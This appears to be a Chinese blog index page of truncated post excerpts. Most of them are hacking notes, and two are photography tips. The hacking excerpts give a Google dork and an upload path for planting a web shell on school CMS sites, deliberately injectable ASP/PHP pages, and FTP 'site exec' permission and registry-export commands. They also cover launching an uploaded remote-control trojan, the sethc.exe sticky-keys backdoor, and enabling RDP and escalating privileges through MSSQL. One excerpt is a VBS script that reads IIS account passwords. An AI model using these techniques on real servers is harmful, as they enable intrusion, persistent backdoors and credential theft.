星星

摘要： 由校园网CMS系统(xyadmin)上传漏洞想到的2009-09-27 04:27校园网CMS系统(xyadmin)上传漏洞 google关键字：inurl:xyadmin 我们的工具还是g.cn google hack 我们随便点一个连接看看 这个是上传页面xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg 传马拿shell xyadmin是校园的缩写 那么其他的如xxadmin可否呢？ http://rnx.tjuci.ed 阅读全文

摘要： 摄影技术的提升是经验的积累，借鉴前人的知识和技巧能够快速提高我们的照片拍摄水平。在胶片时代，经无数摄影师的经验积累汇聚，形成了十二条简化操作、最实用的摄影技巧。这些简化的摄影技巧，将帮助你应对很多难以掌控的拍摄场景。1.阳光十六法则 对于风景摄影而言，过分依靠相机的测光结果往往不能得到最佳的拍摄效果。比如场景中存在大面积暗色景物时，相机的测光系统会增加曝光量，得到的照片效果呈现过曝的效果，天空变成惨白一片，没有任何细节。 这时如果采用“阳光十六法则”，就不会出现这种情况。阳光的照射强度是相对固定的，在阳光照射充足的室外，将相机的光圈设定为f16、快门速度为 1/125秒（iso为100的前提下 阅读全文

摘要： 摄影模式主要有4种：1、全手动曝光；2、全自动曝光；3、光圈优先；4、快门优先 一、全手动曝光需要以下设置： 1、光圈 光圈值用f表示，如佳能 EF-S 18-55mm f3.5-5.6 IS f值越小，光圈越大，光线越多，景深越小（清晰部分小） f值越大，光圈越小，光线越少，景深越大（清晰部分大） 大光圈适合微距拍摄，小光圈适合风景拍摄。 景深除与光圈有关外，还与焦距和拍摄距离相关 焦距越长，景深越小；拍摄距离越近，景深越小 2、快门 快门与光圈配合，用来调节曝光量 快门越快，时间越短，光量越少；可以凝固运动物体瞬间 快门越慢，时间越长，光量越多；可使运动物体虚化成线 1/125秒可抓拍到行 阅读全文

摘要： Mssql:<!–#include file=”conn.asp”–><%hid=request.QueryString(“id”)sql=”select * from admin where id=”&hidset rs=conn.execute (sql)%>Access:<%db=”aspzhuru.mdb”‘这里修改数据库路径或名称Set conn = Server.CreateObject(“ADODB.Connection”)dbpath=”Provider=Microsoft.Jet.OLEDB.4.0;Data Source=” & 阅读全文

摘要： 把下面保存成 Test.php <? $mysql_server_name = "localhost"; $mysql_username = "root"; $mysql_password = "password"; $mysql_database = "phpzr"; //??ݿ?? $conn=mysql_connect( $mysql_server_name, $mysql_username, $mysql_password ); mysql_select_db($mysql_database,$con 阅读全文

摘要： quote site exec "cacls.exe d: /e /t /g everyone:F" #把d盘设置为everyone可以浏览这样一会导出文件放D盘就可以下载了... quote site exec "regedit -e D:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第一处 （-e D:\1.reg 导出后放在D盘下，文件1.reg） quote site exec "regedit -e D:\2.reg H 阅读全文

摘要： 可以执行CMD时候 1.A:将远控的后缀改为.tmp，然后上传上去~！ B:将该远控传上去。C：用命令start e:/admin/admin.tmp，然后等着木马上线~！ 2.替换服务 提权shift键 A:在CMD下执行一下命令： copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe B:链接远程桌面，然后连续按5次shift键，就可以浏览C盘了~！然后C盘windows里面TSa 阅读全文

摘要： 找终端： 第一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值! 而终端所对应的服务名为：TermService 第二步：用netstat -ano命令，列出所有端口对应的PID值! 找到PID值所对应的端口1.通用方法regedit /e c:\3389.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"type c:\3389.reg | find "PortNumber"del c:\338 阅读全文

摘要： 此版本集成了更多的1433服务器恢复提权命令功能,对于目前sa口令许多的功能限制能有效的恢复.如果此版本不能恢复的,建议可以考虑放弃该服务器的提权.版权为原作者所有，特此声明命令集成功能说明：查看系统信息systeminfo查看系统终端端口状况REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber开启系统终端端口REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDen 阅读全文

摘要： 能读取到iis用户和密码，对跨站或者提权是有帮助的！像星外的虚拟主机。有时候exe无法运行或者被杀毒软件K的话用VBS试试。挺简单的代码。代码如下：Set ObjService=GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservice childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"") if IsNumeric(childObjectName)=true then set IIs=objservice.Get 阅读全文